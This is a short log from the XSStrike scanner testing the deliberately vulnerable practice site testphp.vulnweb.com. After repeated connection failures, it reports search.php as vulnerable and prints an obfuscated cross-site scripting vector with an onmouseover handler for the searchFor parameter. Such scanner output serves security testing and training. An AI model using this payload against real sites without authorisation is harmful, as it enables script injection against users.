2024-06-25 10:11:22,796 xsstrike - RUN - Crawling the target
2024-06-25 10:11:22,810 core.photon - RUN - Parsing search.php?test=query1                  
2024-06-25 10:11:33,093 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:11:43,483 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:11:53,854 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:12:04,134 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:12:04,135 xsstrike - INFO - Progress: 2/2

2024-06-25 10:12:11,243 xsstrike - RUN - Crawling the target
2024-06-25 10:12:11,246 core.photon - RUN - Parsing search.php?test=query1                  
2024-06-25 10:12:21,551 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:12:31,839 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:12:42,100 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:12:52,338 core.requester - WARNING - Unable to connect to the target.
2024-06-25 10:12:52,345 xsstrike - INFO - Progress: 2/2

2024-06-25 10:13:34,352 xsstrike - RUN - Crawling the target
2024-06-25 10:13:34,355 core.photon - RUN - Parsing rch.php?test=query&cat=123&ppl=1fhhahwul
2024-06-25 10:13:36,519 modes.crawl - VULN - Vulnerable webpage: [92mhttp://testphp.vulnweb.com/search.php?test=query[0m
2024-06-25 10:13:36,520 modes.crawl - VULN - Vector for [92msearchFor[0m: <hTMl/+/OnmoUseover%0d=%0d(prompt)``%0dx>
2024-06-25 10:13:39,363 xsstrike - INFO - Progress: 2/2

